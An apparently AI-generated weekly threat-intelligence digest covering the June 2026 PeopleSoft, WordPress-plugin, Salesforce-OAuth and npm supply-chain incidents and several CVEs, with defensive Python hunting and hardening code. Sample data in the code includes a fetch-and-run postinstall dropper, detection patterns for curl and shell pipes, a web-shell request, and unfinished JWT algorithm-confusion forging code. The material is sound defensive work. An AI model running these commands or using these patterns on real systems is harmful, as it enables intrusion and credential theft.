ctipilot.ch

CTI Weekly Summary — 2026-W26 (Jun 22 – Jun 28, 2026)

Type: weekly
Date: 2026-W26
Generator: Anthropic Claude (specific model not determined)
Classification: TLP:CLEAR
Language: English
Prompt: v2.64
Items: 33
CVEs: 22

0. Week at a glance

  • NAIC breached through an Oracle PeopleSoft zero-day (CVE-2026-35273); ShinyHunters dumps 3.1 TB and US rating-agency feeds stall — the same UNC6240 campaign GTIG has tracked against ~100 orgs (68% higher education) is still acquiring victims; treat internet-reachable PeopleSoft as assume-compromise. (daily 06-28, NAIC)
  • FortiBleed escalates from credential exposure to confirmed AD domain takeover at a NATO-aligned defence contractor — patch level is irrelevant; rotate any FortiGate credential active May–June and hunt AD persistence. (daily 06-24, CISA)
  • ShapedPlugin's official WordPress update channel shipped backdoored Pro plugins — credential, 2FA-secret and web-shell theft straight from the trusted pipeline. (daily 06-23, Wordfence)
  • The Klue/Icarus Salesforce OAuth breach widened to ~24 named firms, then the attacker was itself hacked and a second extortion group emerged listing ~195 organisations — one dormant integration token cascading into multi-tenant CRM theft. (daily 06-27, SecurityWeek)
  • The Gentlemen ransomware makes Switzerland the second-most-targeted European country, claims 478 victims and adds worm propagation — ESET's leaked-data deep-dive shows victims are chosen on FortiGate misconfiguration, tying the pipeline to FortiBleed reconnaissance. (daily 06-27, inside-it.ch)
  • The week's research converges on the trust chain, not the perimeter — a "Developer Credential Economy" feeding npm worms into AI-coding-agent session hooks, OAuth-grant abuse, and a Browser-in-the-Middle PhaaS (Bluekit) that defeats Device Bound Session Credentials. (daily 06-28, Tenable)
  • Turla's new STOCKSTAY backdoor (GTIG) broadens Russia-nexus espionage toward Western-European foreign-policy targets — delivered via WinRAR CVE-2025-8088 and malicious RDP files; relevant to Swiss/EU governmental entities with Ukraine-adjacent policy work. (daily 06-26, Google GTIG)
  • Policy: the Netherlands' NIS2 law cleared its lower house (entry into force targeted for 1 July); the EU CRA reporting obligation is ~75 days out (11 September) — enforceable Dutch notification clocks are imminent and CRA SRP onboarding should start. (NL Digital Government, ENISA SRP)

1. Highest-impact events — what's on fire if no one acted

NAIC breached through an Oracle PeopleSoft zero-day; ShinyHunters dumps 3.1 TB and US rating-agency feeds stall

If you did nothing this week: any internet-reachable Oracle PeopleSoft instance is a live pre-auth foothold — the same zero-day path that put the US National Association of Insurance Commissioners into ShinyHunters' hands, and PeopleSoft is widely deployed across European public administration, higher education and HR/finance back offices. The W25 looking-ahead flagged that ShinyHunters PeopleSoft notifications were still landing and that EU universities were a probable next-named class; NAIC is the fresh high-profile confirmation that the campaign is still acquiring victims.

NAIC — the standard-setting body for all 50 US state insurance regulators — confirmed on 2026-06-26 that an unauthorised party reached its environment on June 11 via an Oracle PeopleSoft vulnerability, then pivoted from PeopleSoft to gain temporary access to data-storage areas. ShinyHunters claims 3.1 TB exfiltrated (TechRadar, Insurance Journal). The operational tell is the downstream impact NAIC itself disclosed: credit-rating agencies paused their data feeds and NAIC suspended assigning designations to insurer investments — a regulatory-process outage, not just a data-confidentiality event. This is the same PeopleSoft exploitation wave (CVE-2026-35273, the unauthenticated RCE in PeopleTools Environment Management) that Google GTIG attributes to UNC6240/ShinyHunters and has been tracking against the education sector — 68% of identified targets were higher-education institutions; see § 8 for the campaign-level status. Treat any externally-reachable PeopleSoft management endpoint (/PSEMHUB/, /PSIGW/HttpListeningConnector) as a hunt target, not a patch-later item. (daily 06-28)

Changes since first coverage (9 prior appearances)
  1. 2026-06-28 · 2026-06-28
  2. 2026-06-22 · 2026-W25
  3. 2026-06-20 · 2026-06-20
  4. 2026-06-18 · 2026-06-18
  5. 2026-06-16 · 2026-06-16
  6. 2026-06-14 · 2026-W24
  7. 2026-06-14 · 2026-06-14
  8. 2026-06-13 · 2026-06-13
  9. 2026-06-12 · 2026-06-12

ShapedPlugin's official update channel shipped backdoored WordPress Pro plugins — credential, 2FA-secret and web-shell theft

If you did nothing this week: any site running the ShapedPlugin Pro plugins that auto-updated through the licensed channel pulled backdoor code straight from the vendor — patch level was no defence, because the trusted distribution pipeline itself was the attacker. The malicious LicenseLoader.php loads inside the WordPress admin panel, fetches a second stage, installs it as a fake plugin and self-deletes to frustrate forensics.

Wordfence disclosed on 2026-06-22 that an attacker breached ShapedPlugin's build and Easy Digital Downloads distribution pipeline and injected backdoor code into the Pro (paid) releases of three plugins, served through official update channels. The implant harvests credentials and 2FA secrets and drops a web shell (BleepingComputer). For a public-sector or education estate that runs WordPress behind a CMS team, the hunt is for the fake-plugin artefact and unexpected LicenseLoader.php execution in the admin context, plus credential/2FA rotation for any admin who logged in during the exposure window — not merely "update the plugin." (daily 06-23)

Changes since first coverage (1 prior appearance)
  1. 2026-06-23 · 2026-06-23

2. Multi-day campaigns and chains

Klue / Icarus Salesforce OAuth-integration breach — from nine named victims to ~24, then the attacker gets hacked

This is the W25 multi-day item, but the in-window deltas re-shape it materially. At the start of the week the named-victim list stood at nine, mostly cybersecurity vendors (HackerOne, Huntress, Jamf, OneTrust and others, SecurityWeek 06-23). It then accreted through the week: 8x8 filed an SEC 8-K Item 1.05 on 06-23 confirming Salesforce exfiltration; BeyondTrust and LastPass disclosed business-contact and sales data theft on 06-25; by 06-27 roughly two dozen firms had notified, and in a twist the Icarus attacker was itself hacked, with a second extortion actor now threatening the stolen data. Salesforce disabled the Klue connected app.

The new lens the dailies could not assemble: this is a single dormant OAuth integration credential at one SaaS vendor cascading into multi-tenant CRM theft across that vendor's entire customer base — the exact failure mode ReliaQuest framed as "integration abused in CRM data theft" in W25. For a Swiss/EU SOC the takeaway is an OAuth-grant inventory exercise: enumerate third-party connected apps with API scopes into your CRM/identity tenants, revoke dormant grants, and alert on bulk REST/Bulk-API reads from integration principals. No patch helps here, because no software was vulnerable: a delegated token was. (daily 06-23, daily 06-25, daily 06-27)
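The OAuth-grant inventory above as runnable logic, an added example that is not Klue's, Salesforce's or ReliaQuest's code: the grant and API-event records are constructed, their field names are an assumption rather than any vendor's export schema, and the 90-day idle and 50,000-row thresholds are starting points to tune. The three checks it runs are the three the paragraph names: dormant grants, over-broad scopes, and bulk reads by an integration principal inside a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed report date for the example (the week's cut-off).
NOW = datetime(2026, 6, 27, tzinfo=timezone.utc)

# Constructed inventory shaped like a connected-app / OAuth-token export.
# Field names are assumptions, not a specific vendor's schema: one row per grant to a third-party app.
GRANTS = [
    {"app": "competitive-intel-sync", "user": "integration.svc", "scopes": ["api", "refresh_token", "full"],
     "created": "2022-03-14T09:00:00Z", "last_used": "2022-05-01T11:20:00Z"},
    {"app": "hr-connector", "user": "hr.svc", "scopes": ["api", "refresh_token"],
     "created": "2025-01-10T08:00:00Z", "last_used": "2026-06-26T07:45:00Z"},
    {"app": "bi-dashboard", "user": "analyst.one", "scopes": ["api"],
     "created": "2024-11-02T10:00:00Z", "last_used": None},
]

# Constructed API-activity rows (think REST / Bulk API event logs): which principal read how many rows via which app.
API_EVENTS = [
    {"ts": "2026-06-20T03:01:00Z", "user": "integration.svc", "app": "competitive-intel-sync", "api": "bulk", "rows": 30000},
    {"ts": "2026-06-20T03:02:00Z", "user": "integration.svc", "app": "competitive-intel-sync", "api": "bulk", "rows": 25000},
    {"ts": "2026-06-20T03:03:00Z", "user": "integration.svc", "app": "competitive-intel-sync", "api": "rest", "rows": 1000},
    {"ts": "2026-06-20T09:00:00Z", "user": "hr.svc", "app": "hr-connector", "api": "rest", "rows": 200},
]

# Scopes that hand an integration more than a data-sync needs (assumed list; "full" is the usual offender).
BROAD_SCOPES = {"full", "web"}


def _parse(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00")) if ts else None


def dormant_grants(grants, now=NOW, max_idle_days=90):
    """Grants not used inside the idle window. Never-used grants count from their creation date."""
    cutoff = now - timedelta(days=max_idle_days)
    out = []
    for g in grants:
        last = _parse(g["last_used"])
        reference = last or _parse(g["created"])
        if reference < cutoff:
            out.append({**g, "reason": "never used" if last is None else f"idle since {g['last_used']}"})
    return out


def broad_grants(grants):
    """Grants whose scope set includes an over-broad scope, regardless of activity."""
    return [g for g in grants if set(g["scopes"]) & BROAD_SCOPES]


def bulk_read_alerts(events, row_threshold=50_000, window=timedelta(hours=1)):
    """Sum rows read per (user, app) over a sliding window; one alert per principal that crosses the threshold."""
    by_principal = defaultdict(list)
    for e in events:
        by_principal[(e["user"], e["app"])].append((_parse(e["ts"]), e["rows"]))
    alerts = []
    for (user, app), reads in by_principal.items():
        reads.sort()
        start = 0
        for end in range(len(reads)):
            while reads[end][0] - reads[start][0] > window:
                start += 1
            total = sum(rows for _, rows in reads[start:end + 1])
            if total > row_threshold:
                alerts.append({"user": user, "app": app, "rows": total,
                               "from": reads[start][0].isoformat(), "to": reads[end][0].isoformat()})
                break
    return alerts
```

Run `dormant_grants(GRANTS)` and `broad_grants(GRANTS)` against a real export to build the revocation list; the 2022 grant in the constructed data is the Klue-shaped case, dormant and over-scoped at once. `bulk_read_alerts` is the detection side: it fires on the integration principal's 55,000-row burst and stays quiet on the HR connector's routine reads.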

ShinyHunters (UNC6240) — one cluster, multiple reported tradecraft paths in one week

The week is a compact case study in how a single extortion cluster's reported activity spans very different initial-access tradecraft. The two firmly UNC6240-attributed events are the Oracle PeopleSoft zero-day behind the NAIC breach (GTIG/Mandiant attribution, § 1) and the April 2026 Instructure Canvas LMS breach, whose UK Cyber Monitoring Centre sector review landed 06-27 (160 UK universities, extortion, ransom paid). Alongside them, 404 Media's reconstruction (06-26) showed the Madison Square Garden intrusion began with a single vishing call into the company's identity platform — the operator phoned a low-level employee and talked them through authorising access; the 404 Media account documents the technique but names no actor, and the ShinyHunters link rests on the operators' own claims and the SSO-vishing TTP overlap Abnormal Security attributes to the cluster.

The cross-day pattern matters more than any single victim: a server-side zero-day, a SaaS-platform compromise and SSO-targeting vishing all appear under (or adjacent to) one extortion banner in one week, so defending against this cluster is not a single control. It is externally-reachable enterprise-app patching/hunting, third-party SaaS exposure management, and help-desk/identity-platform vishing resistance (callback verification, no MFA-reset-on-call) — all at once. (daily 06-26, daily 06-27, daily 06-28)

npm supply-chain worms — a sustained wave across the week

Three separate npm-ecosystem supply-chain events were in play across the window, and the pattern is the story. Microsoft attributed the Mastra scope compromise (140+ @mastra packages, postinstall dropper) to North Korea's Sapphire Sleet (covered in the daily on 06-21). JFrog documented PostCSS typosquats from the abdrizak account delivering a Nuitka-compiled Python RAT with Chrome DPAPI credential theft. And on 2026-06-25 Socket reported a fresh wave of Miasma / "Mini Shai-Hulud", the self-propagating supply-chain worm last seen backdooring @redhat-cloud-services, across LeoPlatform/RStreams packages (carried in the daily 06-27).

The synthesis: the npm registry is under continuous, parallel pressure from a state actor (DPRK), commodity typosquat crews and a self-replicating worm — three different operators, one ecosystem. The common control is the same one npm v12 is about to enforce by default: disable install scripts (--ignore-scripts), pin and review dependencies, and treat CI build-time package resolution as an attack surface. (daily 06-21, daily 06-24, daily 06-27)
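Before flipping ignore-scripts on in CI it helps to know which dependencies actually carry install hooks and which of those look like droppers, because the same switch that blocks a postinstall dropper also breaks native addons that rely on node-gyp. The audit below is an added example, not Socket's, JFrog's or npm's tooling, run over a constructed node_modules snapshot with invented package names; the suspicious-command patterns are a starting heuristic, not a classifier.

```python
import re

# Lifecycle scripts that run on `npm install`; `prepare` runs for git dependencies and the root project.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that earn an install hook a human look before --ignore-scripts is relaxed for that package.
SUSPICIOUS = [
    ("remote-fetch", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://")),
    ("inline-eval", re.compile(r"\bnode\s+-e\b|\beval\(|new Function\(")),
    ("encoded-payload", re.compile(r"\bbase64\b|fromCharCode|\\x[0-9a-f]{2}")),
    ("shell-pipe", re.compile(r"\|\s*(sh|bash|powershell|pwsh)\b")),
]

# Constructed node_modules snapshot: path -> parsed package.json. Package names are invented.
SNAPSHOT = {
    "node_modules/example-native-addon/package.json": {
        "name": "example-native-addon", "version": "3.1.0",
        "scripts": {"install": "node-gyp rebuild"}},
    "node_modules/example-compromised/package.json": {
        "name": "example-compromised", "version": "1.4.2",
        "scripts": {"postinstall": "node -e \"require('child_process').exec('curl -s http://203.0.113.5/s.sh | sh')\"",
                    "test": "jest"}},
    "node_modules/example-clean/package.json": {
        "name": "example-clean", "version": "0.9.0",
        "scripts": {"build": "tsc", "test": "vitest"}},
}


def audit_install_scripts(snapshot):
    """List every install-time hook in the tree, tagging the ones that match dropper-like patterns."""
    findings = []
    for _path, pkg in snapshot.items():
        for hook in INSTALL_HOOKS:
            cmd = pkg.get("scripts", {}).get(hook)
            if not cmd:
                continue
            tags = [tag for tag, rx in SUSPICIOUS if rx.search(cmd)]
            findings.append({
                "package": f"{pkg['name']}@{pkg['version']}",
                "hook": hook,
                "command": cmd,
                "risk": "high" if tags else "review",   # "review": legitimate-looking but still runs code at install
                "tags": tags,
            })
    return findings


def npmrc_ignores_scripts(npmrc_text):
    """True if an .npmrc (ini syntax, '#' or ';' comments) sets ignore-scripts=true."""
    for line in npmrc_text.splitlines():
        line = line.split("#", 1)[0].split(";", 1)[0].strip()
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "ignore-scripts":
                return value.lower() == "true"
    return False
```

Point it at a real tree by building the snapshot from `node_modules/**/package.json`. Everything tagged "review" is the allow-list you need to handle (build those addons from a vetted source or pre-built binaries) once `ignore-scripts=true` is in the project's .npmrc and CI; anything tagged "high" is a quarantine, not a review.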

3. Vulnerability roll-up

CVE-2026-12569 — PTC Windchill / FlexPLM: pre-auth deserialization RCE, now confirmed exploited with JSP web shells (CISA KEV)

When first covered (06-20) and in the W25 weekly this was a pre-auth deserialization flaw with BSI escalating to admins out-of-hours. The in-window delta: CISA added it to KEV on 06-25 and JSP web-shell deployment against the login interface is now confirmed in the wild. Any internet-reachable Windchill PDMLink or FlexPLM instance should be treated as assume-compromise — manufacturing and defence-supplier PLM is exactly the externally-reachable engineering surface a Swiss/EU industrial estate forgets to inventory.

Changes since first coverage (3 prior appearances)
  1. 2026-06-27 · 2026-06-27 · UPDATE: added to CISA KEV 2026-06-25; active ITW exploitation confirmed with JSP web shells at /Windchill/login/<16-hex>.jsp plus an flst.txt marker. § 4.
  2. 2026-06-21 · 2026-W25 · Consolidated in weekly summary for week 2026-W25
  3. 2026-06-20 · 2026-06-20 · First coverage — actively-exploited CVSS 10.0 pre-auth deserialization RCE; BSI emergency outreach; Immediate Action + deep dive
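Both the PeopleSoft hunt targets in § 1 (/PSEMHUB/, /PSIGW/HttpListeningConnector) and the Windchill web-shell artefacts above (/Windchill/login/<16-hex>.jsp, flst.txt) come down to the same exercise: walk the reverse-proxy or application access log for those paths and ask who is calling them from where. The script below is an added example, not code from the page, CISA or either vendor. The log lines are constructed, the /PSEMHUB/hub sub-path and the internal address ranges are assumptions, and flst.txt is matched by filename only because the advisory text above gives no directory for it.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample lines in combined log format; not traffic from any real estate.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jun/2026:02:14:03 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512 "-" "python-requests/2.32"
10.20.30.40 - - [25/Jun/2026:02:14:09 +0000] "POST /PSEMHUB/hub HTTP/1.1" 200 512 "-" "PSEMAgent"
198.51.100.9 - - [25/Jun/2026:02:15:41 +0000] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 200 128 "-" "curl/8.6.0"
203.0.113.7 - - [25/Jun/2026:02:20:00 +0000] "GET /Windchill/login/3f9a1c7e0b2d4e6f.jsp?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2026:02:20:05 +0000] "GET /Windchill/flst.txt HTTP/1.1" 200 4 "-" "Mozilla/5.0"
192.0.2.55 - - [25/Jun/2026:02:21:10 +0000] "GET /Windchill/login/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
192.0.2.55 - - [25/Jun/2026:02:21:12 +0000] "GET /psp/ps/EMPLOYEE/HRMS/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Ranges that may legitimately reach PeopleSoft's management endpoints (assumed: agent and admin networks).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# (rule name, path pattern, internal sources are expected and therefore not flagged)
RULES = [
    ("peoplesoft-emhub-from-external", re.compile(r"^/PSEMHUB/"), True),
    ("peoplesoft-igw-from-external", re.compile(r"^/PSIGW/HttpListeningConnector"), True),
    # 16-hex JSP name directly under /Windchill/login/, with or without a query string
    ("windchill-16hex-jsp", re.compile(r"^/Windchill/login/[0-9a-fA-F]{16}\.jsp(?:[?;/]|$)"), False),
    ("windchill-flst-marker", re.compile(r"/flst\.txt(?:\?|$)"), False),
]


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def hunt(log_text: str) -> list:
    """Return one hit per (line, rule) match; internal callers are dropped only for rules that expect them."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        for name, pattern, internal_expected in RULES:
            if not pattern.search(rec["path"]):
                continue
            if internal_expected and is_internal(rec["ip"]):
                continue
            hits.append({"rule": name, **rec})
    return hits


def by_source(hits) -> Counter:
    """Pivot to source address: one address touching both the EMHub and a Windchill shell is the triage priority."""
    return Counter(h["ip"] for h in hits)
```

Feed real logs with `hunt(open(path).read())`. The internal-range list is the tuning knob for the PeopleSoft rules (Environment Management agents and admins should be the only callers); the Windchill rules flag regardless of source, since a 16-hex JSP under the login path has no legitimate caller at all.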

CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: Mandiant reconstructs the full zero-day chain

Mandiant (GTIG) published the first complete TTP chain on 06-24 for the Catalyst SD-WAN Manager zero-day activity, observed at a service provider: a peering/authentication bypass (CVE-2026-20127, CVE-2026-20182) leading to credential manipulation, then command injection via a malicious tenant-CSV upload (CVE-2026-20245) to escalate to root and plant a root backdoor. NCSC-CH posted on it, giving it direct Swiss relevance. Telco and public-sector SD-WAN operators should hunt for unexpected file writes under the web-UI service account and for root-owned artefacts post-dating the patch.

Changes since first coverage (4 prior appearances)
  1. 2026-06-27 · 2026-06-27 · UPDATE: Mandiant (GTIG) published full TTP chain 2026-06-24 — auth bypass via CVE-2026-20182/20127 then evil_tenant.csv CSV-injection to a troot root backdoor; NCSC-CH amended post 12579. § 4.
  2. 2026-06-26 · 2026-06-26 · Mandiant forensic reconstruction — pre-disclosure zero-day exploitation at a service provider (late 2025–Mar 2026), full kill chain (peering-bypass foothold → tenant-CSV command injection → troot UID-0 → anti-forensics); also today's deep dive
  3. 2026-06-08 · 2026-W23 · Weekly recap: three-CVE chain yields root + edge-device config-push; no patch; NCSC-CH advisory 12579 updated.
  4. 2026-06-06 · 2026-06-06 · First coverage. Second SD-WAN Manager zero-day; post-auth (netadmin) command injection to root, chainable with pre-auth CVE-2026-20182; Cisco confirms limited ITW config-push exploitation; no patch.

CVE-2025-67038 — Lantronix EDS5000 serial-to-IP converters: unauthenticated command injection to root (BRIDGE:BREAK, CISA KEV)

Forescout Vedere Labs' BRIDGE:BREAK research documented an unauthenticated OS command-injection flaw in Lantronix EDS5000-series device servers — the HTTP management interface concatenates unsanitised input into a shell call. The in-window development is its CISA KEV listing on 2026-06-23 with confirmed in-the-wild exploitation (covered in daily 06-24) — the first BRIDGE:BREAK flaw to flip from research to active abuse. Serial-to-IP converters sit in front of OT, building-management and medical serial devices; firmware 2.0.0R1 closes it. This is an energy/water/healthcare exposure, not an IT one.

Changes since first coverage (1 prior appearance)
  1. 2026-06-24 · 2026-06-24
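The flaw class above, a request parameter concatenated into a shell command, in its vulnerable and hardened forms. This is an added example in Python rather than the device's C firmware; the ping-diagnostic handler is a stand-in for the kind of management function involved and is not the EDS5000 code path itself. The vulnerable variant returns the string it would hand to the shell rather than executing it, so the block is safe to run.

```python
import re
import subprocess

# RFC 1123 hostname or dotted-quad: labels of 1-63 alphanumerics with inner hyphens, joined by dots.
HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_ping_command(host: str) -> str:
    """The pattern the advisory describes: input concatenated into one string destined for sh -c / system()."""
    return "ping -c 1 " + host      # "10.0.0.1; id" becomes two shell commands run as the web server's user (root)


def safe_ping_argv(host: str) -> list:
    """Validate against an allow-list grammar, then pass the value as a single argv element with no shell."""
    if len(host) > 253 or not HOST_RE.match(host):
        raise ValueError("rejected host parameter")
    return ["ping", "-c", "1", host]   # metacharacters are never interpreted; a leading '-' cannot pass HOST_RE


def safe_ping(host: str) -> int:
    """Execute the hardened form; subprocess without shell=True means argv goes straight to execve."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, timeout=5).returncode


def rejects(host: str) -> bool:
    """True if the hardened path refuses the value (used to show what the allow-list catches)."""
    try:
        safe_ping_argv(host)
    except ValueError:
        return True
    return False
```

Two things carry the security, and both are needed: the regex keeps the value inside the grammar a hostname can have (which also rules out option injection such as `-c 9999`, since a label cannot start with a hyphen), and argv-style execution means that even a value the regex missed would arrive as data, never as shell syntax.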

CVE-2026-34908 / CVE-2026-34909 / CVE-2026-34910 — Ubiquiti UniFi OS Server: pre-auth RCE chain, exploited (CISA KEV)

Three max-severity (CVSS 10.0) flaws in UniFi OS Server — improper access control and path traversal that bypass authentication and reach an unauthenticated RCE endpoint — were patched and KEV-listed with confirmed exploitation. UniFi controllers are common in DACH SME, education and public-sector branch networks; the management plane is frequently exposed. Patch and audit controller-account integrity.

Changes since first coverage (3 prior appearances)
  1. 2026-06-28 · 2026-06-28
  2. 2026-06-26 · 2026-06-26
  3. 2026-06-24 · 2026-06-24

CVE-2026-20230 — Cisco Unified CM WebDialer: pre-auth SSRF to arbitrary root file write, reconnaissance-stage scanning observed

Cisco PSIRT's advisory describes an SSRF in the WebDialer service of Unified CM 14/15 that lets an unauthenticated attacker write files to the OS and later escalate to root. The in-window signal: exploitation moved to reconnaissance stage, with a PoC that fingerprints vulnerable devices. Unified CM is core telephony for many cantonal and hospital networks — patch before the scanning becomes exploitation.

Changes since first coverage (2 prior appearances)
  1. 2026-06-24 · 2026-06-24 · First coverage. Recon-stage ITW (Defused) + public PoC; not KEV-listed.
  2. 2026-06-04 · 2026-06-04 · First coverage — public-sector VoIP

CVE-2026-43503 (DirtyClone) and CVE-2026-46331 (pedit COW) — Linux kernel LPE with public weaponised PoCs

Two page-cache-corruption local-privilege-escalation flaws drew working exploits within the window. JFrog published a full DirtyClone walkthrough (XFRM/IPsec skb cloning) on 06-25; a companion tc act_pedit out-of-bounds write (pedit COW) gained a weaponised PoC within a day of assignment. Both are post-auth root escalation on patched-but-unrebooted hosts — prioritise kernel updates on multi-tenant and internet-exposed Linux where an initial foothold is plausible.

Changes since first coverage (1 prior appearance)
  1. 2026-06-27 · 2026-06-27

CVE-2026-58053 — Gitea `act_runner` Docker backend: container-hardening bypass to host escape (public PoC, ENISA-critical)

Gitea act_runner through 0.262.0 passes a workflow-defined container.options string straight into Docker's HostConfig, forcing only Privileged=false while merging --pid=host, --cap-add and --security-opt unchanged — a malicious workflow escapes the job container to the host (VulnCheck). Public PoC, CVSS 9.4, mitigation-only this week. Self-hosted Gitea CI is common in DACH developer shops and universities; restrict who can define workflow container options. The companion Gitea-core auth bypass via X-WEBAUTH-USER (CVE-2026-20896, fixed in 1.26.3/1.26.4) remains worth patching on the same estate.

Changes since first coverage (1 prior appearance)
  1. 2026-06-28 · 2026-06-28
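A simplified model of the policy gap described above, as an added example and not act_runner's Go code: the weak filter strips only --privileged and merges every other docker-run flag into the host configuration, while the hardened filter allow-lists the few options a workflow may legitimately set. The flag allow-list and the dict-shaped configuration are assumptions of the example; the escape check covers the three flags named in the advisory text plus the privileged bit itself.

```python
import shlex

# Flags a workflow may tune without touching isolation (assumed allow-list; adjust to your runner policy).
ALLOWED = {"--env", "-e", "--memory", "-m", "--cpus", "--shm-size", "--workdir", "-w", "--hostname"}


def parse_options(options: str) -> list:
    """Turn a docker-run style options string into (flag, value) pairs; bare flags get value None."""
    toks = shlex.split(options)
    pairs, i = [], 0
    while i < len(toks):
        tok = toks[i]
        if not tok.startswith("-"):
            raise ValueError(f"unexpected positional token {tok!r}")
        if tok.startswith("--") and "=" in tok:
            flag, value = tok.split("=", 1)
        elif i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            flag, value, i = tok, toks[i + 1], i + 1
        else:
            flag, value = tok, None
        pairs.append((flag, value))
        i += 1
    return pairs


def weak_host_config(options: str) -> dict:
    """Model of the flawed policy: force Privileged=false, merge everything else unchanged."""
    cfg = {"Privileged": False}
    for flag, value in parse_options(options):
        if flag == "--privileged":
            continue
        cfg.setdefault(flag, []).append(value)
    return cfg


def hardened_host_config(options: str) -> dict:
    """Allow-list policy: anything outside ALLOWED is refused outright, never merged."""
    cfg = {"Privileged": False}
    for flag, value in parse_options(options):
        if flag not in ALLOWED:
            raise ValueError(f"{flag} is not permitted in workflow container.options")
        cfg.setdefault(flag, []).append(value)
    return cfg


def escapes_host(cfg: dict) -> bool:
    """True if the merged config grants a known container-to-host escape primitive."""
    caps = [c.upper() for c in cfg.get("--cap-add", []) if c]
    return bool(
        cfg.get("Privileged")
        or "host" in cfg.get("--pid", [])
        or any(c in ("SYS_ADMIN", "SYS_MODULE", "ALL") for c in caps)
        or any(o in ("seccomp=unconfined", "apparmor=unconfined") for o in cfg.get("--security-opt", []))
    )


def policy_accepts(options: str) -> bool:
    """Whether the hardened policy would let this options string reach the Docker API at all."""
    try:
        hardened_host_config(options)
    except ValueError:
        return False
    return True
```

The weak filter is the shape of the mistake: a deny-list of one. Privileged=false is honoured, and the workflow still lands in the host PID namespace with CAP_SYS_ADMIN and no seccomp profile, which is all an escape needs. The hardened filter inverts the question to "which flags are allowed", which is the only form that survives the next flag Docker adds.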

CVE-2026-11800 (JWT algorithm-confusion) and CVE-2026-9800 (policy-enforcer authz bypass) — Keycloak identity-plane fixes

Keycloak 26.6.4 fixed eight CVEs. The headline flaw is CVE-2026-11800, a JWT algorithm-confusion that lets an attacker with valid client credentials forge an assertion, bypass signature verification and impersonate any federated user behind the affected identity provider (GHSA-gqj5-2xp5-3qmp, BSI WID-SEC-2026-2093); the bundled CVE-2026-9800 is a separate policy-enforcer authorization bypass via incorrect URI comparison. Keycloak is the IdP of choice across European public-sector, healthcare and finance deployments — these are identity-plane breaks, not app bugs. Patch to 26.6.4.

Changes since first coverage (1 prior appearance)
  1. 2026-06-28 · 2026-06-28
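The generic algorithm-confusion pattern, as an added example; it is not Keycloak's code and does not reproduce the specific GHSA-gqj5-2xp5-3qmp code path. A 12-bit textbook RSA key (p=61, q=53) stands in for the IdP's RS256 key so the block runs on the standard library alone, and it is deliberately a toy: no padding, brute-forceable, never to be reused. The point it demonstrates is independent of key size: a verifier that lets the token's header pick the algorithm will HMAC with whatever key material it holds, and when that material is the public key, the attacker already has it.

```python
import base64
import hashlib
import hmac
import json


def b64u(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


# Toy RSA parameters standing in for the IdP's real RS256 key; the public half is what the relying party stores.
N, E, D = 3233, 17, 2753
IDP_PUBLIC_KEY = json.dumps({"kty": "RSA", "n": N, "e": E})


def toy_rs256_sign(data: bytes) -> bytes:
    m = int.from_bytes(hashlib.sha256(data).digest(), "big") % N
    return pow(m, D, N).to_bytes(2, "big")


def toy_rs256_verify(data: bytes, sig: bytes, pub: dict) -> bool:
    m = int.from_bytes(hashlib.sha256(data).digest(), "big") % pub["n"]
    return pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == m


def hs256(data: bytes, key: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def encode_jwt(header: dict, payload: dict, sign) -> str:
    signing_input = f"{b64u(json.dumps(header).encode())}.{b64u(json.dumps(payload).encode())}"
    return f"{signing_input}.{b64u(sign(signing_input.encode()))}"


def split_jwt(token: str):
    h, p, s = token.split(".")
    return json.loads(b64u_decode(h)), json.loads(b64u_decode(p)), f"{h}.{p}".encode(), b64u_decode(s)


def verify_confusable(token: str, key_material: str):
    """Vulnerable: the header chooses the algorithm and one stored key serves both branches."""
    header, payload, signing_input, sig = split_jwt(token)
    alg = header.get("alg")
    if alg == "RS256":
        ok = toy_rs256_verify(signing_input, sig, json.loads(key_material))
    elif alg == "HS256":
        ok = hmac.compare_digest(hs256(signing_input, key_material.encode()), sig)   # public key used as HMAC secret
    else:
        ok = False
    return payload if ok else None


def verify_pinned(token: str, public_key_json: str, expected_alg: str = "RS256"):
    """Hardened: the verifier, not the token, fixes the algorithm; HS256 is never attempted with a public key."""
    header, payload, signing_input, sig = split_jwt(token)
    if header.get("alg") != expected_alg:
        return None
    return payload if toy_rs256_verify(signing_input, sig, json.loads(public_key_json)) else None


def issue_legit(payload: dict) -> str:
    """IdP side: a properly signed RS256 assertion."""
    return encode_jwt({"alg": "RS256", "typ": "JWT"}, payload, toy_rs256_sign)


def forge_hs256(payload: dict, public_key_json: str) -> str:
    """Attacker side: relabel as HS256 and sign with the public key bytes, which are public by definition."""
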